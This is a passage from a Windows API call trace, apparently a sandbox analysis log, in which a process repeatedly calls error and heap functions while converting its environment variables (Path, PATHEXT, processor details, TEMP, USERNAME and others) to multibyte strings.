(dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691250) returned 0x38 [0097.540] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691250, Size=0x3c) returned 0x691250 [0097.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0097.540] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x69) returned 0x691298 [0097.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x691298, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.540] SetLastError (dwErrCode=0x0) [0097.540] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.541] SetLastError (dwErrCode=0x0) [0097.541] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.542] SetLastError (dwErrCode=0x0) [0097.542] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691250) returned 0x3c [0097.543] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691250, Size=0x40) returned 0x691250 [0097.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0097.543] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3e) returned 0x685788 [0097.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x685788, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.543] SetLastError (dwErrCode=0x0) [0097.543] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] SetLastError (dwErrCode=0x0) [0097.544] GetLastError () returned 0x0 [0097.544] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691250) returned 0x40 [0097.544] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691250, Size=0x44) returned 0x691310 [0097.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0097.544] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1b) returned 0x68ef28 [0097.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x68ef28, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0097.544] GetLastError () returned 0x0 [0097.544] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x44 [0097.544] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x48) returned 0x691310 [0097.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0097.544] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1d) returned 0x68ef50 [0097.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x68ef50, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0097.544] GetLastError () returned 0x0 [0097.544] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x48 [0097.544] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x4c) returned 0x691310 [0097.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0097.544] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x48) returned 0x686b78 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x686b78, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0097.545] GetLastError () returned 0x0 [0097.545] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x4c [0097.545] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x50) returned 0x691310 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.545] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x12) returned 0x691250 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x691250, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0097.545] GetLastError () returned 0x0 [0097.545] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x50 [0097.545] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x54) returned 0x691310 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.545] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x691270 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x691270, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0097.545] GetLastError () returned 0x0 [0097.545] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x54 [0097.545] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x58) returned 0x691310 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0097.545] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1b) returned 0x68ef78 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x68ef78, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0097.545] GetLastError () returned 0x0 [0097.545] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x58 [0097.545] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x5c) returned 0x691310 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0097.545] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68aa00 [0097.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x68aa00, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0097.545] GetLastError () returned 0x0 [0097.546] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x5c [0097.546] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x60) returned 0x691310 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0097.546] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x29) returned 0x68b0d8 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x68b0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0097.546] GetLastError () returned 0x0 [0097.546] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x60 [0097.546] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x64) returned 0x691310 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.546] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1e) returned 0x68efa0 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x68efa0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0097.546] GetLastError () returned 0x0 [0097.546] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x64 [0097.546] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x68) returned 0x691310 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0097.546] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x41) returned 0x686bc8 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x686bc8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0097.546] GetLastError () returned 0x0 [0097.546] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x68 [0097.546] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x6c) returned 0x691310 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.546] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x17) returned 0x691388 [0097.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x691388, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0097.546] GetLastError () returned 0x0 [0097.546] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x6c [0097.546] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x70) returned 0x691310 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.547] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xf) returned 0x68e670 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x68e670, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0097.547] GetLastError () returned 0x0 [0097.547] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691310) returned 0x70 [0097.547] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691310, Size=0x74) returned 0x6913a8 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0097.547] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x16) returned 0x691310 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x691310, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0097.547] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x74 [0097.547] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x78) returned 0x6913a8 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0097.547] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2a) returned 0x68b110 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x68b110, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0097.547] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x78 [0097.547] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x7c) returned 0x6913a8 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0097.547] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x29) returned 0x68b148 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x68b148, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0097.547] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x7c [0097.547] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x80) returned 0x6913a8 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.547] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x15) returned 0x691330 [0097.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x691330, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0097.547] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x80 [0097.547] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x84) returned 0x6913a8 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.548] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1e) returned 0x68efc8 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x68efc8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0097.548] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x84 [0097.548] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x88) returned 0x6913a8 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0097.548] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2a) returned 0x68b180 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x68b180, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0097.548] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x88 [0097.548] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x8c) returned 0x6913a8 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.548] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x12) returned 0x691350 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x691350, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0097.548] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x8c [0097.548] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x90) returned 0x6913a8 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.548] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x691440 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x691440, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0097.548] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6913a8) returned 0x90 [0097.548] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6913a8, Size=0x94) returned 0x691460 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0097.548] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x46) returned 0x686c18 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x686c18, cbMultiByte=70, 